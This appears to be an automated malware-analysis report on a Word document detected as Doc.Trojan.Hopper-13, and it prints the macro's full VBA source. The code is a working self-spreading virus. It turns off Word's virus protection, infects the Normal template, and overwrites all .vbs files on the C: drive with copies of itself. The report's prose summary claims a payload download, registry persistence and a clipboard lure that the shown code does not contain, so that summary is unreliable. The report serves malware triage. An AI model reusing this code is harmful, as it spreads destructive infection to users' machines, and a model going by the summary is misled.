MALICIOUS
320
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1547.001 Registry Run Keys / Startup Folder
T1105 Ingress Tool Transfer
The sample contains VBA macros that utilize `WScript.Shell` and `CreateObject` to copy the current document to other files within the same directory. It then attempts to establish persistence by writing to the Normal.dot template and potentially the registry, indicated by the `WScript.Shell` usage and the 'Clipboard command execution lure' heuristic. The script's intent is to download and execute a secondary payload, as suggested by the use of `Wscript.CreateObject("Wscript.Shell")` and file copying mechanisms.
Heuristics 6
-
ClamAV: Doc.Trojan.Hopper-13 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Trojan.Hopper-13
-
VBA macros detected medium 2 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
WScript.Shell usage critical OLE_VBA_WSCRIPTWScript.Shell usageMatched line in script
N.InsertLines 62, "Set FSO = CreateObject(" + Chr(34) + "Scripting.FileSystemObject" + Chr(34) + ")" N.InsertLines 63, "Set WshShell = Wscript.CreateObject(" + Chr(34) + "Wscript.Shell" + Chr(34) + ")" N.InsertLines 64, "parent = Wscript.ScriptFullName" -
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
End If Set FSO = CreateObject("Scripting.FileSystemObject") N.InsertLines 59, "" -
Reference to Windows Script Host high SC_STR_WSCRIPTReference to Windows Script Host
-
Clipboard command execution lure high SE_CLIPBOARD_COMMAND_LUREDocument tells the user to copy or paste clipboard content into Run, PowerShell, cmd, or another shell-like execution context
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 3120 bytes |
SHA-256: ac2525880754727594b3810c7bcc9c62f48a8d1426f38b6d1552b8f81a991de9 |
|||
|
Detection
ClamAV:
Doc.Trojan.Hopper-13
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Document_Close()
'1nternal
On Error GoTo Break
Set A = ActiveDocument.VBProject.VBComponents(1).CodeModule
Set N = NormalTemplate.VBProject.VBComponents(1).CodeModule
Options.VirusProtection = False
Options.ConfirmConversions = False
Options.SaveNormalPrompt = False
If N.Lines(2, 1) <> "'1nternal" Then
For i = 1 To 58
N.InsertLines i, A.Lines(i, 1)
Next
End If
If A.Lines(2, 1) <> "'1nternal" Then
For i = 1 To 58
A.InsertLines i, N.Lines(i, 1)
Next
End If
Set FSO = CreateObject("Scripting.FileSystemObject")
N.InsertLines 59, ""
N.InsertLines 60, "On Error Resume Next"
N.InsertLines 61, "Dim WordObj, FSO, WshShell"
N.InsertLines 62, "Set FSO = CreateObject(" + Chr(34) + "Scripting.FileSystemObject" + Chr(34) + ")"
N.InsertLines 63, "Set WshShell = Wscript.CreateObject(" + Chr(34) + "Wscript.Shell" + Chr(34) + ")"
N.InsertLines 64, "parent = Wscript.ScriptFullName"
N.InsertLines 65, "vPath = Left(parent, InStrRev(parent, " + Chr(34) + "\" + Chr(34) + "))"
N.InsertLines 66, "For Each target in FSO.GetFolder(vPath).Files"
N.InsertLines 67, " FSO.CopyFile parent, target.Name, 1"
N.InsertLines 68, "Next"
N.InsertLines 69, "Set WordObj = CreateObject(" + Chr(34) + "Word.Application" + Chr(34) + ")"
N.InsertLines 70, "WordObj.Options.SaveNormalPrompt = False"
N.InsertLines 71, "Set NT = WordObj.Templates(1).VBProject.VBComponents(1).CodeModule"
N.InsertLines 72, "If NT.Lines(2,1) <> " + Chr(34) + "'1nternal" + Chr(34) + " Then"
N.InsertLines 73, " NT.AddfromFile Wscript.ScriptFullName"
N.InsertLines 74, " NT.ReplaceLine 3, " + Chr(34) + "On Error Goto Break" + Chr(34)
N.InsertLines 75, " NT.DeleteLines 58, 19"
N.InsertLines 76, "End If"
N.InsertLines 77, "Set NT = Nothing"
N.InsertLines 78, "WordObj.Quit"
Set fs = Application.FileSearch
fs.NewSearch
fs.LookIn = "C:\"
fs.SearchSubFolders = True
fs.FileName = "*.vbs"
fs.Execute
For i = 1 To fs.FoundFiles.Count
Set f = FSO.OpenTextFile(fs.FoundFiles(i), 2, True)
N.ReplaceLine 3, "'ReplaceIt"
For k = 1 To 78
f.Write N.Lines(k, 1) + Chr(13) + Chr(10)
Next
f.Close
Next
N.DeleteLines 59, 20
N.ReplaceLine 3, "On Error Goto Break"
Break:
Set NT = Nothing
WordObj.Quit
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.